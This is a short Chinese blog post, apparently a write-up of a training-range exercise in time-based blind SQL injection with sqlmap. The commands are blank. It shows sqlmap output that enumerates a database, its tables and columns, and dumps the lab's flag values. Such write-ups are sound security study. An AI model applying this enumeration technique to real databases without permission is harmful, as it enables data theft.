掌控安全 SQL 注入靶场练习 - 时间盲注
掌控安全 SQL 注入靶场练习 - 时间盲注
SQL 时间盲注
0x01 使用 SQLMAP 工具
0x01.1 dump database
|
|
执行结果
current database: 'kanwolongxia'
0x01.2 dump tables
|
|
执行结果
Database: kanwolongxia
[3 tables]
+--------+
| user |
| loflag |
| news |
+--------+
3 tables: user, loflag, news
0x01.3 dump columns
|
|
执行结果
Database: kanwolongxia
Table: loflag
[2 columns]
+--------+--------------+
| Column | Type |
+--------+--------------+
| flaglo | varchar(255) |
| Id | int(11) |
+--------+--------------+
0x01.4 dump values
|
|
执行结果
Database: kanwolongxia
Table: loflag
[5 entries]
+----------------+
| flaglo |
+----------------+
| zKaQ-Moren |
| zKaQ-QQQ |
| zKaQ-RD |
| zKaQ-time-hj |
| zKaQ-time-zxxz |
+----------------+
- 原文链接:https://typonotes.com/posts/2020/12/09/zkaq-sql-inject-by-timebased-blind/
- 本文为原创文章,转载注明出处。
- 欢迎 扫码关注公众号
Go与云原生
或 订阅网站 https://typonotes.com/ 。 - 第一时间看后续精彩文章。觉得好的话,请猛击文章右下角「在看」,感谢支持。